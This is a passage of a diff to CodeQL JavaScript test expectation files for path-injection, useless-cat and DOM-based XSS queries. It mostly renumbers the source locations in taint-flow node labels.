@@ -1141,8 +1141,8 @@ subpaths | tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | | tainted-string-steps.js:27:18:27:36 | path.split(unknown) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:27:18:27:36 | path.split(unknown) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | | torrents.js:7:25:7:27 | loc | torrents.js:5:13:5:38 | parseTo ... t).name | torrents.js:7:25:7:27 | loc | This path depends on a $@. | torrents.js:5:13:5:38 | parseTo ... t).name | user-provided value | -| typescript.ts:12:29:12:32 | path | typescript.ts:9:24:9:30 | req.url | typescript.ts:12:29:12:32 | path | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | -| typescript.ts:21:39:21:43 | path3 | typescript.ts:9:24:9:30 | req.url | typescript.ts:21:39:21:43 | path3 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | -| typescript.ts:24:39:24:43 | path4 | typescript.ts:9:24:9:30 | req.url | typescript.ts:24:39:24:43 | path4 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | -| typescript.ts:32:29:32:33 | path6 | typescript.ts:9:24:9:30 | req.url | typescript.ts:32:29:32:33 | path6 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | +| typescript.ts:11:29:11:32 | path | typescript.ts:9:24:9:30 | req.url | typescript.ts:11:29:11:32 | path | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | +| typescript.ts:20:39:20:43 | path3 | typescript.ts:9:24:9:30 | req.url | typescript.ts:20:39:20:43 | path3 | This path depends on a $@. 
| typescript.ts:9:24:9:30 | req.url | user-provided value | +| typescript.ts:23:39:23:43 | path4 | typescript.ts:9:24:9:30 | req.url | typescript.ts:23:39:23:43 | path4 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | +| typescript.ts:31:29:31:33 | path6 | typescript.ts:9:24:9:30 | req.url | typescript.ts:31:29:31:33 | path6 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | | views.js:1:43:1:55 | req.params[0] | views.js:1:43:1:55 | req.params[0] | views.js:1:43:1:55 | req.params[0] | This path depends on a $@. | views.js:1:43:1:55 | req.params[0] | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected index 1a561b8fc416..820d8af4767d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected +++ b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected @@ -78,7 +78,7 @@ options | uselesscat.js:86:1:86:75 | execFil ... utf8'}) | uselesscat.js:86:57:86:74 | {encoding: 'utf8'} | | uselesscat.js:100:1:100:56 | execFil ... ptions) | uselesscat.js:100:42:100:55 | unknownOptions | | uselesscat.js:111:1:111:51 | spawn(' ... it'] }) | uselesscat.js:111:14:111:50 | { stdio ... rit'] } | -| uselesscat.js:136:17:138:2 | execSyn ... tf8'\\n}) | uselesscat.js:136:51:138:1 | { // NO ... utf8'\\n} | +| uselesscat.js:136:17:138:2 | execSyn ... tf8'\\n}) | uselesscat.js:136:51:138:1 | { // $ ... utf8'\\n} | | uselesscat.js:147:1:147:47 | shelljs ... utf8'}) | uselesscat.js:147:29:147:46 | {encoding: 'utf8'} | | uselesscat.js:151:1:151:48 | cspawn( ... tf8' }) | uselesscat.js:151:28:151:47 | { encoding: 'utf8' } | | uselesscat.js:156:1:156:35 | cspawn( ... tf8' }) | uselesscat.js:156:15:156:34 | { encoding: 'utf8' } | 
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected index eb46033824f4..9b8f27cdc70c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected @@ -152,7 +152,7 @@ nodes | dragAndDrop.ts:73:29:73:39 | droppedHtml | semmle.label | droppedHtml | | event-handler-receiver.js:2:31:2:83 | '

' | semmle.label | '

' | | event-handler-receiver.js:2:49:2:61 | location.href | semmle.label | location.href | -| express.js:7:15:7:33 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:6:15:6:33 | req.param("wobble") | semmle.label | req.param("wobble") | | jquery.js:2:7:2:40 | tainted | semmle.label | tainted | | jquery.js:2:17:2:40 | documen ... .search | semmle.label | documen ... .search | | jquery.js:4:5:4:11 | tainted | semmle.label | tainted | @@ -202,8 +202,8 @@ nodes | jwt-server.js:7:17:7:35 | req.param("wobble") | semmle.label | req.param("wobble") | | jwt-server.js:9:16:9:20 | taint | semmle.label | taint | | jwt-server.js:9:55:9:61 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:25 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:29 | decoded.foo | semmle.label | decoded.foo | +| jwt-server.js:10:19:10:25 | decoded | semmle.label | decoded | +| jwt-server.js:10:19:10:29 | decoded.foo | semmle.label | decoded.foo | | nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | semmle.label | `Hi, yo ... sage}.` | | nodemailer.js:13:50:13:66 | req.query.message | semmle.label | req.query.message | | optionalSanitizer.js:2:7:2:39 | target | semmle.label | target | 
@@ -343,9 +343,9 @@ nodes | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | -| translate.js:9:27:9:38 | searchParams | semmle.label | searchParams | -| translate.js:9:27:9:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| translate.js:9:27:9:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | +| translate.js:8:27:8:38 | searchParams | semmle.label | searchParams | +| translate.js:8:27:8:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| translate.js:8:27:8:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | | trusted-types-lib.js:1:28:1:28 | x | semmle.label | x | | trusted-types-lib.js:2:12:2:12 | x | semmle.label | x | | trusted-types.js:3:62:3:62 | x | semmle.label | x | @@ -368,240 +368,240 @@ nodes | tst3.js:10:38:10:43 | data.p | semmle.label | data.p | | tst.js:2:7:2:39 | target | semmle.label | target | | tst.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:5:18:5:23 | target | semmle.label | target | -| tst.js:8:18:8:126 | "" | semmle.label | "" | -| tst.js:8:37:8:58 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:12:5:12:42 | '
' | semmle.label | '
' | -| tst.js:12:28:12:33 | target | semmle.label | target | -| tst.js:17:7:17:56 | params | semmle.label | params | -| tst.js:17:7:17:56 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | -| tst.js:17:16:17:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:17:25:17:41 | document.location | semmle.label | document.location | -| tst.js:18:18:18:23 | params | semmle.label | params | -| tst.js:18:18:18:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:18:18:18:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:20:7:20:61 | searchParams | semmle.label | searchParams | -| tst.js:20:7:20:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:20:22:20:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | -| tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... 
ing(1)) [MapValue] | -| tst.js:20:42:20:47 | target | semmle.label | target | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:21:18:21:29 | searchParams | semmle.label | searchParams | -| tst.js:21:18:21:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:21:18:21:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | -| tst.js:24:14:24:19 | target | semmle.label | target | -| tst.js:26:18:26:23 | target | semmle.label | target | -| tst.js:28:5:28:28 | documen ... .search | semmle.label | documen ... .search | -| tst.js:31:10:31:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:34:16:34:20 | bar() | semmle.label | bar() | -| tst.js:36:14:36:14 | x | semmle.label | x | -| tst.js:37:10:37:10 | x | semmle.label | x | -| tst.js:40:16:40:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | -| tst.js:40:20:40:43 | documen ... .search | semmle.label | documen ... .search | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:43:10:43:31 | "
" ...
" | semmle.label | "
" ...
" | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:46:16:46:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | +| tst.js:4:18:4:23 | target | semmle.label | target | +| tst.js:6:18:6:126 | "" | semmle.label | "" | +| tst.js:6:37:6:58 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:9:5:9:42 | '
' | semmle.label | '
' | +| tst.js:9:28:9:33 | target | semmle.label | target | +| tst.js:14:7:14:56 | params | semmle.label | params | +| tst.js:14:7:14:56 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | +| tst.js:14:16:14:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:14:25:14:41 | document.location | semmle.label | document.location | +| tst.js:15:18:15:23 | params | semmle.label | params | +| tst.js:15:18:15:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:15:18:15:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:17:7:17:61 | searchParams | semmle.label | searchParams | +| tst.js:17:7:17:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:17:22:17:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | +| tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... 
ing(1)) [MapValue] | +| tst.js:17:42:17:47 | target | semmle.label | target | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:18:18:18:29 | searchParams | semmle.label | searchParams | +| tst.js:18:18:18:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:18:18:18:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | +| tst.js:21:14:21:19 | target | semmle.label | target | +| tst.js:22:18:22:23 | target | semmle.label | target | +| tst.js:24:5:24:28 | documen ... .search | semmle.label | documen ... .search | +| tst.js:27:10:27:33 | documen ... .search | semmle.label | documen ... .search | +| tst.js:29:16:29:20 | bar() | semmle.label | bar() | +| tst.js:31:14:31:14 | x | semmle.label | x | +| tst.js:32:10:32:10 | x | semmle.label | x | +| tst.js:34:16:34:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | +| tst.js:34:20:34:43 | documen ... .search | semmle.label | documen ... .search | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:37:10:37:31 | "
" ...
" | semmle.label | "
" ...
" | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:39:16:39:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | +| tst.js:39:21:39:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:41:15:41:15 | s | semmle.label | s | +| tst.js:43:12:43:12 | s | semmle.label | s | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:46:16:46:45 | chop(do ... search) | semmle.label | chop(do ... search) | | tst.js:46:21:46:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:48:15:48:15 | s | semmle.label | s | -| tst.js:50:12:50:12 | s | semmle.label | s | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:54:16:54:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:56:16:56:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:58:16:58:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:26:58:30 | bar() | semmle.label | bar() | -| tst.js:60:34:60:34 | s | semmle.label | s | -| tst.js:62:18:62:18 | s | semmle.label | s | -| tst.js:64:25:64:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:65:25:65:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:68:16:68:20 | bar() | semmle.label | bar() | -| tst.js:70:1:70:27 | [,docum ... 
search] [1] | semmle.label | [,docum ... search] [1] | -| tst.js:70:3:70:26 | documen ... .search | semmle.label | documen ... .search | -| tst.js:70:46:70:46 | x | semmle.label | x | -| tst.js:73:20:73:20 | x | semmle.label | x | -| tst.js:77:49:77:72 | documen ... .search | semmle.label | documen ... .search | -| tst.js:81:26:81:49 | documen ... .search | semmle.label | documen ... .search | -| tst.js:82:25:82:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:84:33:84:56 | documen ... .search | semmle.label | documen ... .search | -| tst.js:85:32:85:55 | documen ... .search | semmle.label | documen ... .search | -| tst.js:90:39:90:62 | documen ... .search | semmle.label | documen ... .search | -| tst.js:96:30:96:53 | documen ... .search | semmle.label | documen ... .search | -| tst.js:102:25:102:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:7:107:44 | v | semmle.label | v | -| tst.js:107:11:107:34 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:11:107:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:110:18:110:18 | v | semmle.label | v | -| tst.js:136:18:136:18 | v | semmle.label | v | -| tst.js:148:29:148:50 | window. ... .search | semmle.label | window. ... .search | -| tst.js:151:29:151:29 | v | semmle.label | v | -| tst.js:151:49:151:49 | v | semmle.label | v | -| tst.js:155:29:155:46 | xssSourceService() | semmle.label | xssSourceService() | -| tst.js:158:40:158:61 | window. ... .search | semmle.label | window. ... .search | -| tst.js:177:9:177:41 | target | semmle.label | target | -| tst.js:177:18:177:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:180:28:180:33 | target | semmle.label | target | -| tst.js:184:9:184:42 | tainted | semmle.label | tainted | -| tst.js:184:19:184:42 | documen ... .search | semmle.label | documen ... 
.search | -| tst.js:186:31:186:37 | tainted | semmle.label | tainted | -| tst.js:188:42:188:48 | tainted | semmle.label | tainted | -| tst.js:189:33:189:39 | tainted | semmle.label | tainted | -| tst.js:191:54:191:60 | tainted | semmle.label | tainted | -| tst.js:192:45:192:51 | tainted | semmle.label | tainted | -| tst.js:193:49:193:55 | tainted | semmle.label | tainted | -| tst.js:197:9:197:42 | tainted | semmle.label | tainted | -| tst.js:197:19:197:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:199:67:199:73 | tainted | semmle.label | tainted | -| tst.js:200:67:200:73 | tainted | semmle.label | tainted | -| tst.js:204:35:204:41 | tainted | semmle.label | tainted | -| tst.js:206:46:206:52 | tainted | semmle.label | tainted | -| tst.js:207:38:207:44 | tainted | semmle.label | tainted | -| tst.js:208:35:208:41 | tainted | semmle.label | tainted | -| tst.js:212:28:212:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | -| tst.js:213:28:213:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | -| tst.js:214:28:214:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | -| tst.js:218:32:218:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | -| tst.js:225:28:225:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | -| tst.js:226:28:226:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | -| tst.js:227:28:227:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | -| tst.js:231:32:231:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | -| tst.js:236:35:236:41 | tainted | semmle.label | tainted | -| tst.js:238:20:238:26 | tainted | semmle.label | tainted | -| tst.js:240:23:240:29 | tainted | semmle.label | tainted | -| tst.js:241:23:241:29 | tainted | semmle.label | tainted | -| tst.js:247:39:247:55 | props.propTainted | semmle.label | props.propTainted | -| tst.js:251:60:251:82 | this.st ... Tainted | semmle.label | this.st ... 
Tainted | -| tst.js:255:23:255:29 | tainted | semmle.label | tainted | -| tst.js:259:7:259:17 | window.name | semmle.label | window.name | -| tst.js:260:7:260:10 | name | semmle.label | name | -| tst.js:264:11:264:21 | window.name | semmle.label | window.name | -| tst.js:280:22:280:29 | location | semmle.label | location | -| tst.js:285:9:285:29 | tainted | semmle.label | tainted | -| tst.js:285:19:285:29 | window.name | semmle.label | window.name | -| tst.js:288:59:288:65 | tainted | semmle.label | tainted | -| tst.js:301:9:301:16 | location | semmle.label | location | -| tst.js:302:10:302:10 | e | semmle.label | e | -| tst.js:303:20:303:20 | e | semmle.label | e | -| tst.js:308:10:308:17 | location | semmle.label | location | -| tst.js:310:10:310:10 | e | semmle.label | e | -| tst.js:311:20:311:20 | e | semmle.label | e | -| tst.js:316:35:316:42 | location | semmle.label | location | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:327:18:327:34 | document.location | semmle.label | document.location | -| tst.js:331:7:331:43 | params | semmle.label | params | -| tst.js:331:7:331:43 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | -| tst.js:331:16:331:43 | getTain ... hParams | semmle.label | getTain ... hParams | -| tst.js:331:16:331:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... 
hParams [MapValue] | -| tst.js:332:18:332:23 | params | semmle.label | params | -| tst.js:332:18:332:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:332:18:332:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | -| tst.js:341:20:341:36 | document.location | semmle.label | document.location | -| tst.js:343:5:343:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | -| tst.js:343:5:343:17 | getUrl().hash | semmle.label | getUrl().hash | -| tst.js:343:5:343:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | -| tst.js:348:7:348:39 | target | semmle.label | target | -| tst.js:348:16:348:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:349:12:349:17 | target | semmle.label | target | -| tst.js:355:10:355:42 | target | semmle.label | target | -| tst.js:355:19:355:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:356:16:356:21 | target | semmle.label | target | -| tst.js:357:20:357:25 | target | semmle.label | target | -| tst.js:360:21:360:26 | target | semmle.label | target | -| tst.js:363:18:363:23 | target | semmle.label | target | -| tst.js:371:7:371:39 | target | semmle.label | target | -| tst.js:371:16:371:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:374:18:374:23 | target | semmle.label | target | -| tst.js:381:7:381:39 | target | semmle.label | target | -| tst.js:381:16:381:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:384:18:384:23 | target | semmle.label | target | -| tst.js:386:18:386:23 | target | semmle.label | target | -| tst.js:386:18:386:29 | target.taint | semmle.label | target.taint | -| tst.js:391:3:391:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | -| tst.js:391:19:391:42 | documen ... .search | semmle.label | documen ... 
.search | -| tst.js:392:18:392:23 | target [taint3] | semmle.label | target [taint3] | -| tst.js:392:18:392:30 | target.taint3 | semmle.label | target.taint3 | -| tst.js:397:18:397:23 | target | semmle.label | target | -| tst.js:397:18:397:30 | target.taint5 | semmle.label | target.taint5 | -| tst.js:406:18:406:23 | target | semmle.label | target | -| tst.js:406:18:406:30 | target.taint7 | semmle.label | target.taint7 | -| tst.js:408:3:408:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | -| tst.js:408:19:408:24 | target | semmle.label | target | -| tst.js:408:19:408:24 | target [taint8] | semmle.label | target [taint8] | -| tst.js:408:19:408:31 | target.taint8 | semmle.label | target.taint8 | -| tst.js:409:18:409:23 | target [taint8] | semmle.label | target [taint8] | -| tst.js:409:18:409:30 | target.taint8 | semmle.label | target.taint8 | -| tst.js:416:7:416:46 | payload | semmle.label | payload | -| tst.js:416:17:416:36 | window.location.hash | semmle.label | window.location.hash | -| tst.js:416:17:416:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | -| tst.js:417:18:417:24 | payload | semmle.label | payload | -| tst.js:419:7:419:55 | match | semmle.label | match | -| tst.js:419:15:419:34 | window.location.hash | semmle.label | window.location.hash | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | -| tst.js:421:20:421:24 | match | semmle.label | match | -| tst.js:421:20:421:27 | match[1] | semmle.label | match[1] | -| tst.js:424:18:424:37 | window.location.hash | semmle.label | window.location.hash | -| tst.js:424:18:424:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | -| tst.js:424:18:424:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | -| tst.js:428:7:428:39 | target | semmle.label | target | -| tst.js:428:16:428:39 | documen ... .search | semmle.label | documen ... 
.search | -| tst.js:430:18:430:23 | target | semmle.label | target | -| tst.js:430:18:430:89 | target. ... data>') | semmle.label | target. ... data>') | -| tst.js:436:6:436:38 | source | semmle.label | source | -| tst.js:436:15:436:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:440:28:440:33 | source | semmle.label | source | -| tst.js:441:33:441:38 | source | semmle.label | source | -| tst.js:442:34:442:39 | source | semmle.label | source | -| tst.js:443:41:443:46 | source | semmle.label | source | -| tst.js:444:44:444:49 | source | semmle.label | source | -| tst.js:445:32:445:37 | source | semmle.label | source | -| tst.js:453:7:453:39 | source | semmle.label | source | -| tst.js:453:16:453:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:455:18:455:23 | source | semmle.label | source | -| tst.js:456:18:456:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | -| tst.js:456:36:456:41 | source | semmle.label | source | -| tst.js:460:6:460:38 | source | semmle.label | source | -| tst.js:460:15:460:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:463:21:463:26 | source | semmle.label | source | -| tst.js:465:19:465:24 | source | semmle.label | source | -| tst.js:467:20:467:25 | source | semmle.label | source | -| tst.js:471:7:471:46 | url | semmle.label | url | -| tst.js:471:13:471:36 | documen ... .search | semmle.label | documen ... .search | -| tst.js:471:13:471:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:473:19:473:21 | url | semmle.label | url | -| tst.js:474:26:474:28 | url | semmle.label | url | -| tst.js:475:25:475:27 | url | semmle.label | url | -| tst.js:476:20:476:22 | url | semmle.label | url | -| tst.js:486:22:486:24 | url | semmle.label | url | -| tst.js:491:23:491:35 | location.hash | semmle.label | location.hash | -| tst.js:491:23:491:45 | locatio ... bstr(1) | semmle.label | locatio ... 
bstr(1) | -| tst.js:494:18:494:30 | location.hash | semmle.label | location.hash | -| tst.js:494:18:494:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | -| tst.js:501:33:501:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | -| tst.js:501:43:501:62 | window.location.hash | semmle.label | window.location.hash | -| tst.js:508:7:508:39 | target | semmle.label | target | -| tst.js:508:16:508:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:509:18:509:23 | target | semmle.label | target | -| tst.js:509:18:509:54 | target. ... "), '') | semmle.label | target. ... "), '') | +| tst.js:47:16:47:45 | chop(do ... search) | semmle.label | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:48:16:48:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:26:48:30 | bar() | semmle.label | bar() | +| tst.js:50:34:50:34 | s | semmle.label | s | +| tst.js:51:18:51:18 | s | semmle.label | s | +| tst.js:53:25:53:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:54:25:54:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:56:16:56:20 | bar() | semmle.label | bar() | +| tst.js:58:1:58:27 | [,docum ... search] [1] | semmle.label | [,docum ... search] [1] | +| tst.js:58:3:58:26 | documen ... .search | semmle.label | documen ... .search | +| tst.js:58:46:58:46 | x | semmle.label | x | +| tst.js:60:20:60:20 | x | semmle.label | x | +| tst.js:63:49:63:72 | documen ... .search | semmle.label | documen ... .search | +| tst.js:67:26:67:49 | documen ... .search | semmle.label | documen ... .search | +| tst.js:68:25:68:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:70:33:70:56 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:71:32:71:55 | documen ... .search | semmle.label | documen ... .search | +| tst.js:76:39:76:62 | documen ... .search | semmle.label | documen ... .search | +| tst.js:82:30:82:53 | documen ... .search | semmle.label | documen ... .search | +| tst.js:88:25:88:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:7:93:44 | v | semmle.label | v | +| tst.js:93:11:93:34 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:11:93:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:95:18:95:18 | v | semmle.label | v | +| tst.js:120:18:120:18 | v | semmle.label | v | +| tst.js:132:29:132:50 | window. ... .search | semmle.label | window. ... .search | +| tst.js:135:29:135:29 | v | semmle.label | v | +| tst.js:135:49:135:49 | v | semmle.label | v | +| tst.js:139:29:139:46 | xssSourceService() | semmle.label | xssSourceService() | +| tst.js:142:40:142:61 | window. ... .search | semmle.label | window. ... .search | +| tst.js:161:9:161:41 | target | semmle.label | target | +| tst.js:161:18:161:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:164:28:164:33 | target | semmle.label | target | +| tst.js:168:9:168:42 | tainted | semmle.label | tainted | +| tst.js:168:19:168:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:170:31:170:37 | tainted | semmle.label | tainted | +| tst.js:172:42:172:48 | tainted | semmle.label | tainted | +| tst.js:173:33:173:39 | tainted | semmle.label | tainted | +| tst.js:175:54:175:60 | tainted | semmle.label | tainted | +| tst.js:176:45:176:51 | tainted | semmle.label | tainted | +| tst.js:177:49:177:55 | tainted | semmle.label | tainted | +| tst.js:181:9:181:42 | tainted | semmle.label | tainted | +| tst.js:181:19:181:42 | documen ... .search | semmle.label | documen ... 
